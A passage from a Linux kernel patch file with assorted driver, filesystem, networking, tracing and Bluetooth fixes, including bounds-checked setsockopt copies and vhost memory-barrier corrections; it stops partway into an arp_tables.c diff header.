+diff --git a/drivers/net/ethernet/micrel/ks8851_par.c b/drivers/net/ethernet/micrel/ks8851_par.c
+index 7f49042484bdc..96fb0ffcedb90 100644
+--- a/drivers/net/ethernet/micrel/ks8851_par.c
++++ b/drivers/net/ethernet/micrel/ks8851_par.c
+@@ -210,16 +210,6 @@ static void ks8851_wrfifo_par(struct ks8851_net *ks, struct sk_buff *txp,
+ 	iowrite16_rep(ksp->hw_addr, txp->data, len / 2);
+ }
+ 
+-/**
+- * ks8851_rx_skb_par - receive skbuff
+- * @ks: The device state.
+- * @skb: The skbuff
+- */
+-static void ks8851_rx_skb_par(struct ks8851_net *ks, struct sk_buff *skb)
+-{
+-	netif_rx(skb);
+-}
+-
+ static unsigned int ks8851_rdreg16_par_txqcr(struct ks8851_net *ks)
+ {
+ 	return ks8851_rdreg16_par(ks, KS_TXQCR);
+@@ -298,7 +288,6 @@ static int ks8851_probe_par(struct platform_device *pdev)
+ 	ks->rdfifo = ks8851_rdfifo_par;
+ 	ks->wrfifo = ks8851_wrfifo_par;
+ 	ks->start_xmit = ks8851_start_xmit_par;
+-	ks->rx_skb = ks8851_rx_skb_par;
+ 
+ #define STD_IRQ (IRQ_LCI |	/* Link Change */	\
+ 		 IRQ_RXI |	/* RX done */		\
+diff --git a/drivers/net/ethernet/micrel/ks8851_spi.c b/drivers/net/ethernet/micrel/ks8851_spi.c
+index 88e26c120b483..4dcbff789b19d 100644
+--- a/drivers/net/ethernet/micrel/ks8851_spi.c
++++ b/drivers/net/ethernet/micrel/ks8851_spi.c
+@@ -298,16 +298,6 @@ static unsigned int calc_txlen(unsigned int len)
+ 	return ALIGN(len + 4, 4);
+ }
+ 
+-/**
+- * ks8851_rx_skb_spi - receive skbuff
+- * @ks: The device state
+- * @skb: The skbuff
+- */
+-static void ks8851_rx_skb_spi(struct ks8851_net *ks, struct sk_buff *skb)
+-{
+-	netif_rx(skb);
+-}
+-
+ /**
+  * ks8851_tx_work - process tx packet(s)
+  * @work: The work strucutre what was scheduled.
+@@ -435,7 +425,6 @@ static int ks8851_probe_spi(struct spi_device *spi)
+ 	ks->rdfifo = ks8851_rdfifo_spi;
+ 	ks->wrfifo = ks8851_wrfifo_spi;
+ 	ks->start_xmit = ks8851_start_xmit_spi;
+-	ks->rx_skb = ks8851_rx_skb_spi;
+ 	ks->flush_tx_work = ks8851_flush_tx_work_spi;
+ 
+ #define STD_IRQ (IRQ_LCI |	/* Link Change */	\
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_port.c b/drivers/net/ethernet/microchip/sparx5/sparx5_port.c
+index 32709d21ab2f9..212bf6f4ed72d 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_port.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_port.c
+@@ -730,7 +730,7 @@ static int sparx5_port_pcs_low_set(struct sparx5 *sparx5,
+ 	bool sgmii = false, inband_aneg = false;
+ 	int err;
+ 
+-	if (port->conf.inband) {
++	if (conf->inband) {
+ 		if (conf->portmode == PHY_INTERFACE_MODE_SGMII ||
+ 		    conf->portmode == PHY_INTERFACE_MODE_QSGMII)
+ 			inband_aneg = true; /* Cisco-SGMII in-band-aneg */
+@@ -947,7 +947,7 @@ int sparx5_port_pcs_set(struct sparx5 *sparx5,
+ 	if (err)
+ 		return -EINVAL;
+ 
+-	if (port->conf.inband) {
++	if (conf->inband) {
+ 		/* Enable/disable 1G counters in ASM */
+ 		spx5_rmw(ASM_PORT_CFG_CSC_STAT_DIS_SET(high_speed_dev),
+ 			 ASM_PORT_CFG_CSC_STAT_DIS,
+diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c
+index 3f8da6f0b25ce..488ca1c854962 100644
+--- a/drivers/net/geneve.c
++++ b/drivers/net/geneve.c
+@@ -930,7 +930,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!pskb_inet_may_pull(skb))
++	if (!skb_vlan_inet_prepare(skb))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+@@ -1028,7 +1028,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!pskb_inet_may_pull(skb))
++	if (!skb_vlan_inet_prepare(skb))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index 450a8578157cb..2116f5ee36e20 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -1715,7 +1715,7 @@ static int hisi_sas_debug_I_T_nexus_reset(struct domain_device *device)
+ 	if (dev_is_sata(device)) {
+ 		struct ata_link *link = &device->sata_dev.ap->link;
+ 
+-		rc = ata_wait_after_reset(link, HISI_SAS_WAIT_PHYUP_TIMEOUT,
++		rc = ata_wait_after_reset(link, jiffies + HISI_SAS_WAIT_PHYUP_TIMEOUT,
+ 					  smp_ata_check_ready_type);
+ 	} else {
+ 		msleep(2000);
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index 7aee4d093969a..969008071decd 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -1058,7 +1058,7 @@ qla_edif_app_getstats(scsi_qla_host_t *vha, struct bsg_job *bsg_job)
+ 
+ 		list_for_each_entry_safe(fcport, tf, &vha->vp_fcports, list) {
+ 			if (fcport->edif.enable) {
+-				if (pcnt > app_req.num_ports)
++				if (pcnt >= app_req.num_ports)
+ 					break;
+ 
+ 				app_reply->elem[pcnt].rekey_count =
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 61c72e62abd49..1b00ed5ef1cfa 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -2523,9 +2523,19 @@ bool vhost_vq_avail_empty(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+ 	r = vhost_get_avail_idx(vq, &avail_idx);
+ 	if (unlikely(r))
+ 		return false;
++
+ 	vq->avail_idx = vhost16_to_cpu(vq, avail_idx);
++	if (vq->avail_idx != vq->last_avail_idx) {
++		/* Since we have updated avail_idx, the following
++		 * call to vhost_get_vq_desc() will read available
++		 * ring entries. Make sure that read happens after
++		 * the avail_idx read.
++		 */
++		smp_rmb();
++		return false;
++	}
+ 
+-	return vq->avail_idx == vq->last_avail_idx;
++	return true;
+ }
+ EXPORT_SYMBOL_GPL(vhost_vq_avail_empty);
+ 
+@@ -2562,9 +2572,19 @@ bool vhost_enable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+ 		       &vq->avail->idx, r);
+ 		return false;
+ 	}
++
+ 	vq->avail_idx = vhost16_to_cpu(vq, avail_idx);
++	if (vq->avail_idx != vq->last_avail_idx) {
++		/* Since we have updated avail_idx, the following
++		 * call to vhost_get_vq_desc() will read available
++		 * ring entries. Make sure that read happens after
++		 * the avail_idx read.
++		 */
++		smp_rmb();
++		return true;
++	}
+ 
+-	return vq->avail_idx != vq->last_avail_idx;
++	return false;
+ }
+ EXPORT_SYMBOL_GPL(vhost_enable_notify);
+ 
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index c6426080cf0ad..1494ce990d298 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -1115,6 +1115,9 @@ __btrfs_commit_inode_delayed_items(struct btrfs_trans_handle *trans,
+ 	if (ret)
+ 		return ret;
+ 
++	ret = btrfs_record_root_in_trans(trans, node->root);
++	if (ret)
++		return ret;
+ 	ret = btrfs_update_delayed_inode(trans, node->root, path, node);
+ 	return ret;
+ }
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index c14d4f70e84bd..80ca7b435b0d1 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -4154,6 +4154,8 @@ void btrfs_qgroup_convert_reserved_meta(struct btrfs_root *root, int num_bytes)
+ 				      BTRFS_QGROUP_RSV_META_PREALLOC);
+ 	trace_qgroup_meta_convert(root, num_bytes);
+ 	qgroup_convert_meta(fs_info, root->root_key.objectid, num_bytes);
++	if (!sb_rdonly(fs_info->sb))
++		add_root_meta_rsv(root, num_bytes, BTRFS_QGROUP_RSV_META_PERTRANS);
+ }
+ 
+ /*
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index b172091f42612..5549c843f0d3f 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -700,14 +700,6 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 		h->reloc_reserved = reloc_reserved;
+ 	}
+ 
+-	/*
+-	 * Now that we have found a transaction to be a part of, convert the
+-	 * qgroup reservation from prealloc to pertrans. A different transaction
+-	 * can't race in and free our pertrans out from under us.
+-	 */
+-	if (qgroup_reserved)
+-		btrfs_qgroup_convert_reserved_meta(root, qgroup_reserved);
+-
+ got_it:
+ 	if (!current->journal_info)
+ 		current->journal_info = h;
+@@ -741,8 +733,15 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 		 * not just freed.
+ 		 */
+ 		btrfs_end_transaction(h);
+-		return ERR_PTR(ret);
++		goto reserve_fail;
+ 	}
++	/*
++	 * Now that we have found a transaction to be a part of, convert the
++	 * qgroup reservation from prealloc to pertrans. A different transaction
++	 * can't race in and free our pertrans out from under us.
++	 */
++	if (qgroup_reserved)
++		btrfs_qgroup_convert_reserved_meta(root, qgroup_reserved);
+ 
+ 	return h;
+ 
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index f4ad343b06c1f..2ca1881919c7b 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -386,8 +386,8 @@ smb2_close_cached_fid(struct kref *ref)
+ 	if (cfid->is_open) {
+ 		rc = SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
+-		if (rc != -EBUSY && rc != -EAGAIN)
+-			atomic_dec(&cfid->tcon->num_remote_opens);
++		if (rc) /* should we retry on -EBUSY or -EAGAIN? */
++			cifs_dbg(VFS, "close cached dir rc %d\n", rc);
+ 	}
+ 
+ 	free_cached_dir(cfid);
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index b79097b9070b3..5d6a5f3097cd0 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -659,4 +659,11 @@ static inline bool dma_fence_is_container(struct dma_fence *fence)
+ 	return dma_fence_is_array(fence) || dma_fence_is_chain(fence);
+ }
+ 
++#define DMA_FENCE_WARN(f, fmt, args...) \
++	do {								\
++		struct dma_fence *__ff = (f);				\
++		pr_warn("f %llu#%llu: " fmt, __ff->context, __ff->seqno,\
++			 ##args);					\
++	} while (0)
++
+ #endif /* __LINUX_DMA_FENCE_H */
+diff --git a/include/linux/irqflags.h b/include/linux/irqflags.h
+index 2b665c32f5fe6..2e09c269bf9d8 100644
+--- a/include/linux/irqflags.h
++++ b/include/linux/irqflags.h
+@@ -126,7 +126,7 @@ do {						\
+ # define lockdep_softirq_enter()		do { } while (0)
+ # define lockdep_softirq_exit()			do { } while (0)
+ # define lockdep_hrtimer_enter(__hrtimer)	false
+-# define lockdep_hrtimer_exit(__context)	do { } while (0)
++# define lockdep_hrtimer_exit(__context)	do { (void)(__context); } while (0)
+ # define lockdep_posixtimer_enter()		do { } while (0)
+ # define lockdep_posixtimer_exit()		do { } while (0)
+ # define lockdep_irq_work_enter(__work)		do { } while (0)
+diff --git a/include/linux/u64_stats_sync.h b/include/linux/u64_stats_sync.h
+index 46040d66334a8..79c3bbaa7e13e 100644
+--- a/include/linux/u64_stats_sync.h
++++ b/include/linux/u64_stats_sync.h
+@@ -135,10 +135,11 @@ static inline void u64_stats_inc(u64_stats_t *p)
+ 	p->v++;
+ }
+ 
+-static inline void u64_stats_init(struct u64_stats_sync *syncp)
+-{
+-	seqcount_init(&syncp->seq);
+-}
++#define u64_stats_init(syncp)				\
++	do {						\
++		struct u64_stats_sync *__s = (syncp);	\
++		seqcount_init(&__s->seq);		\
++	} while (0)
+ 
+ static inline void __u64_stats_update_begin(struct u64_stats_sync *syncp)
+ {
+diff --git a/include/net/addrconf.h b/include/net/addrconf.h
+index 86eb2aba1479c..5bcc63eade035 100644
+--- a/include/net/addrconf.h
++++ b/include/net/addrconf.h
+@@ -437,6 +437,10 @@ static inline void in6_ifa_hold(struct inet6_ifaddr *ifp)
+ 	refcount_inc(&ifp->refcnt);
+ }
+ 
++static inline bool in6_ifa_hold_safe(struct inet6_ifaddr *ifp)
++{
++	return refcount_inc_not_zero(&ifp->refcnt);
++}
+ 
+ /*
+  *	compute link-local solicited-node multicast address
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 0920b669b9b31..16d6936baa2fb 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -54,7 +54,7 @@ struct unix_sock {
+ 	struct mutex		iolock, bindlock;
+ 	struct sock		*peer;
+ 	struct list_head	link;
+-	atomic_long_t		inflight;
++	unsigned long		inflight;
+ 	spinlock_t		lock;
+ 	unsigned long		gc_flags;
+ #define UNIX_GC_CANDIDATE	0
+diff --git a/include/net/bluetooth/bluetooth.h b/include/net/bluetooth/bluetooth.h
+index bcc5a4cd2c17b..5aaf7d7f3c6fa 100644
+--- a/include/net/bluetooth/bluetooth.h
++++ b/include/net/bluetooth/bluetooth.h
+@@ -565,6 +565,15 @@ static inline struct sk_buff *bt_skb_sendmmsg(struct sock *sk,
+ 	return skb;
+ }
+ 
++static inline int bt_copy_from_sockptr(void *dst, size_t dst_size,
++				       sockptr_t src, size_t src_size)
++{
++	if (dst_size > src_size)
++		return -EINVAL;
++
++	return copy_from_sockptr(dst, src, dst_size);
++}
++
+ int bt_to_errno(u16 code);
+ __u8 bt_status(int err);
+ 
+diff --git a/include/net/ip_tunnels.h b/include/net/ip_tunnels.h
+index bca80522f95c8..f9906b73e7ff4 100644
+--- a/include/net/ip_tunnels.h
++++ b/include/net/ip_tunnels.h
+@@ -351,6 +351,39 @@ static inline bool pskb_inet_may_pull(struct sk_buff *skb)
+ 	return pskb_network_may_pull(skb, nhlen);
+ }
+ 
++/* Variant of pskb_inet_may_pull().
++ */
++static inline bool skb_vlan_inet_prepare(struct sk_buff *skb)
++{
++	int nhlen = 0, maclen = ETH_HLEN;
++	__be16 type = skb->protocol;
++
++	/* Essentially this is skb_protocol(skb, true)
++	 * And we get MAC len.
++	 */
++	if (eth_type_vlan(type))
++		type = __vlan_get_protocol(skb, type, &maclen);
++
++	switch (type) {
++#if IS_ENABLED(CONFIG_IPV6)
++	case htons(ETH_P_IPV6):
++		nhlen = sizeof(struct ipv6hdr);
++		break;
++#endif
++	case htons(ETH_P_IP):
++		nhlen = sizeof(struct iphdr);
++		break;
++	}
++	/* For ETH_P_IPV6/ETH_P_IP we make sure to pull
++	 * a base network header in skb->head.
++	 */
++	if (!pskb_may_pull(skb, maclen + nhlen))
++		return false;
++
++	skb_set_network_header(skb, maclen);
++	return true;
++}
++
+ static inline int ip_encap_hlen(struct ip_tunnel_encap *e)
+ {
+ 	const struct ip_tunnel_encap_ops *ops;
+diff --git a/io_uring/net.c b/io_uring/net.c
+index b1b564c04d1e7..48404bd330017 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1229,6 +1229,7 @@ int io_sendmsg_zc(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (req_has_async_data(req)) {
+ 		kmsg = req->async_data;
++		kmsg->msg.msg_control_user = sr->msg_control;
+ 	} else {
+ 		ret = io_sendmsg_copy_hdr(req, &iomsg);
+ 		if (ret)
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index e6f0101941ed8..2c44dd12a158c 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -2788,7 +2788,8 @@ enum cpu_mitigations {
+ };
+ 
+ static enum cpu_mitigations cpu_mitigations __ro_after_init =
+-	CPU_MITIGATIONS_AUTO;
++	IS_ENABLED(CONFIG_SPECULATION_MITIGATIONS) ? CPU_MITIGATIONS_AUTO :
++						     CPU_MITIGATIONS_OFF;
+ 
+ static int __init mitigations_parse_cmdline(char *arg)
+ {
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index dbfddfa86c14e..5b5ee060a2db5 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -1567,10 +1567,17 @@ static int check_kprobe_address_safe(struct kprobe *p,
+ 	jump_label_lock();
+ 	preempt_disable();
+ 
+-	/* Ensure it is not in reserved area nor out of text */
+-	if (!(core_kernel_text((unsigned long) p->addr) ||
+-	    is_module_text_address((unsigned long) p->addr)) ||
+-	    in_gate_area_no_mm((unsigned long) p->addr) ||
++	/* Ensure the address is in a text area, and find a module if exists. */
++	*probed_mod = NULL;
++	if (!core_kernel_text((unsigned long) p->addr)) {
++		*probed_mod = __module_text_address((unsigned long) p->addr);
++		if (!(*probed_mod)) {
++			ret = -EINVAL;
++			goto out;
++		}
++	}
++	/* Ensure it is not in reserved area. */
++	if (in_gate_area_no_mm((unsigned long) p->addr) ||
+ 	    within_kprobe_blacklist((unsigned long) p->addr) ||
+ 	    jump_label_text_reserved(p->addr, p->addr) ||
+ 	    static_call_text_reserved(p->addr, p->addr) ||
+@@ -1580,8 +1587,7 @@ static int check_kprobe_address_safe(struct kprobe *p,
+ 		goto out;
+ 	}
+ 
+-	/* Check if 'p' is probing a module. */
+-	*probed_mod = __module_text_address((unsigned long) p->addr);
++	/* Get module refcount and reject __init functions for loaded modules. */
+ 	if (*probed_mod) {
+ 		/*
+ 		 * We must hold a refcount of the probed module while updating
+diff --git a/kernel/power/suspend.c b/kernel/power/suspend.c
+index a718067deecee..3aae526cc4aac 100644
+--- a/kernel/power/suspend.c
++++ b/kernel/power/suspend.c
+@@ -106,6 +106,12 @@ static void s2idle_enter(void)
+ 	swait_event_exclusive(s2idle_wait_head,
+ 		    s2idle_state == S2IDLE_STATE_WAKE);
+ 
++	/*
++	 * Kick all CPUs to ensure that they resume their timers and restore
++	 * consistent system state.
++	 */
++	wake_up_all_idle_cpus();
++
+ 	cpus_read_unlock();
+ 
+ 	raw_spin_lock_irq(&s2idle_lock);
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index d2947de3021a9..337162e0c3d53 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1543,7 +1543,6 @@ static void rb_tail_page_update(struct ring_buffer_per_cpu *cpu_buffer,
+ 	old_write = local_add_return(RB_WRITE_INTCNT, &next_page->write);
+ 	old_entries = local_add_return(RB_WRITE_INTCNT, &next_page->entries);
+ 
+-	local_inc(&cpu_buffer->pages_touched);
+ 	/*
+ 	 * Just make sure we have seen our old_write and synchronize
+ 	 * with any interrupts that come in.
+@@ -1580,8 +1579,9 @@ static void rb_tail_page_update(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 */
+ 		local_set(&next_page->page->commit, 0);
+ 
+-		/* Again, either we update tail_page or an interrupt does */
+-		(void)cmpxchg(&cpu_buffer->tail_page, tail_page, next_page);
++		/* Either we update tail_page or an interrupt does */
++		if (try_cmpxchg(&cpu_buffer->tail_page, &tail_page, next_page))
++			local_inc(&cpu_buffer->pages_touched);
+ 	}
+ }
+ 
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index a6d2f99f847d3..24859d9645050 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -1669,6 +1669,7 @@ static int trace_format_open(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
++#ifdef CONFIG_PERF_EVENTS
+ static ssize_t
+ event_id_read(struct file *filp, char __user *ubuf, size_t cnt, loff_t *ppos)
+ {
+@@ -1683,6 +1684,7 @@ event_id_read(struct file *filp, char __user *ubuf, size_t cnt, loff_t *ppos)
+ 
+ 	return simple_read_from_buffer(ubuf, cnt, ppos, buf, len);
+ }
++#endif
+ 
+ static ssize_t
+ event_filter_read(struct file *filp, char __user *ubuf, size_t cnt,
+@@ -2127,10 +2129,12 @@ static const struct file_operations ftrace_event_format_fops = {
+ 	.release = seq_release,
+ };
+ 
++#ifdef CONFIG_PERF_EVENTS
+ static const struct file_operations ftrace_event_id_fops = {
+ 	.read = event_id_read,
+ 	.llseek = default_llseek,
+ };
++#endif
+ 
+ static const struct file_operations ftrace_event_filter_fops = {
+ 	.open = tracing_open_file_tr,
+diff --git a/net/batman-adv/translation-table.c b/net/batman-adv/translation-table.c
+index 5d8cee74772fe..4fc66cd95dc47 100644
+--- a/net/batman-adv/translation-table.c
++++ b/net/batman-adv/translation-table.c
+@@ -3948,7 +3948,7 @@ void batadv_tt_local_resize_to_mtu(struct net_device *soft_iface)
+ 
+ 	spin_lock_bh(&bat_priv->tt.commit_lock);
+ 
+-	while (true) {
++	while (timeout) {
+ 		table_size = batadv_tt_local_table_transmit_size(bat_priv);
+ 		if (packet_size_max >= table_size)
+ 			break;
+diff --git a/net/bluetooth/hci_request.c b/net/bluetooth/hci_request.c
+index 4468647df6722..cf69e973b724f 100644
+--- a/net/bluetooth/hci_request.c
++++ b/net/bluetooth/hci_request.c
+@@ -105,8 +105,10 @@ void hci_req_sync_complete(struct hci_dev *hdev, u8 result, u16 opcode,
+ 	if (hdev->req_status == HCI_REQ_PEND) {
+ 		hdev->req_result = result;
+ 		hdev->req_status = HCI_REQ_DONE;
+-		if (skb)
++		if (skb) {
++			kfree_skb(hdev->req_skb);
+ 			hdev->req_skb = skb_get(skb);
++		}
+ 		wake_up_interruptible(&hdev->req_wait_q);
+ 	}
+ }
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index 947ca580bb9a2..4198ca66fbe10 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -745,7 +745,7 @@ static int l2cap_sock_setsockopt_old(struct socket *sock, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct l2cap_chan *chan = l2cap_pi(sk)->chan;
+ 	struct l2cap_options opts;
+-	int len, err = 0;
++	int err = 0;
+ 	u32 opt;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -772,11 +772,9 @@ static int l2cap_sock_setsockopt_old(struct socket *sock, int optname,
+ 		opts.max_tx   = chan->max_tx;
+ 		opts.txwin_size = chan->tx_win;
+ 
+-		len = min_t(unsigned int, sizeof(opts), optlen);
+-		if (copy_from_sockptr(&opts, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opts, sizeof(opts), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opts.txwin_size > L2CAP_DEFAULT_EXT_WINDOW) {
+ 			err = -EINVAL;
+@@ -819,10 +817,9 @@ static int l2cap_sock_setsockopt_old(struct socket *sock, int optname,
+ 		break;
+ 
+ 	case L2CAP_LM:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt & L2CAP_LM_FIPS) {
+ 			err = -EINVAL;
+@@ -903,7 +900,7 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 	struct bt_security sec;
+ 	struct bt_power pwr;
+ 	struct l2cap_conn *conn;
+-	int len, err = 0;
++	int err = 0;
+ 	u32 opt;
+ 	u16 mtu;
+ 	u8 mode;
+@@ -929,11 +926,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		sec.level = BT_SECURITY_LOW;
+ 
+-		len = min_t(unsigned int, sizeof(sec), optlen);
+-		if (copy_from_sockptr(&sec, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&sec, sizeof(sec), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (sec.level < BT_SECURITY_LOW ||
+ 		    sec.level > BT_SECURITY_FIPS) {
+@@ -978,10 +973,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt) {
+ 			set_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags);
+@@ -993,10 +987,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 		break;
+ 
+ 	case BT_FLUSHABLE:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt > BT_FLUSHABLE_ON) {
+ 			err = -EINVAL;
+@@ -1028,11 +1021,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		pwr.force_active = BT_POWER_FORCE_ACTIVE_ON;
+ 
+-		len = min_t(unsigned int, sizeof(pwr), optlen);
+-		if (copy_from_sockptr(&pwr, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&pwr, sizeof(pwr), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (pwr.force_active)
+ 			set_bit(FLAG_FORCE_ACTIVE, &chan->flags);
+@@ -1041,10 +1032,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 		break;
+ 
+ 	case BT_CHANNEL_POLICY:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt > BT_CHANNEL_POLICY_AMP_PREFERRED) {
+ 			err = -EINVAL;
+@@ -1089,10 +1079,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&mtu, optval, sizeof(u16))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&mtu, sizeof(mtu), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (chan->mode == L2CAP_MODE_EXT_FLOWCTL &&
+ 		    sk->sk_state == BT_CONNECTED)
+@@ -1120,10 +1109,9 @@ static int l2cap_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&mode, optval, sizeof(u8))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&mode, sizeof(mode), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		BT_DBG("mode %u", mode);
+ 
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 6d4168cfeb563..2e9137c539a49 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -831,7 +831,7 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			       sockptr_t optval, unsigned int optlen)
+ {
+ 	struct sock *sk = sock->sk;
+-	int len, err = 0;
++	int err = 0;
+ 	struct bt_voice voice;
+ 	u32 opt;
+ 	struct bt_codecs *codecs;
+@@ -850,10 +850,9 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt)
+ 			set_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags);
+@@ -870,11 +869,10 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		voice.setting = sco_pi(sk)->setting;
+ 
+-		len = min_t(unsigned int, sizeof(voice), optlen);
+-		if (copy_from_sockptr(&voice, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&voice, sizeof(voice), optval,
++					   optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		/* Explicitly check for these values */
+ 		if (voice.setting != BT_VOICE_TRANSPARENT &&
+@@ -897,10 +895,9 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 		break;
+ 
+ 	case BT_PKT_STATUS:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt)
+ 			sco_pi(sk)->cmsg_mask |= SCO_CMSG_PKT_STATUS;
+@@ -941,9 +938,9 @@ static int sco_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(buffer, optval, optlen)) {
++		err = bt_copy_from_sockptr(buffer, optlen, optval, optlen);
++		if (err) {
+ 			hci_dev_put(hdev);
+-			err = -EFAULT;
+ 			break;
+ 		}
+ 
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index b150c9929b12e..14365b20f1c5c 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
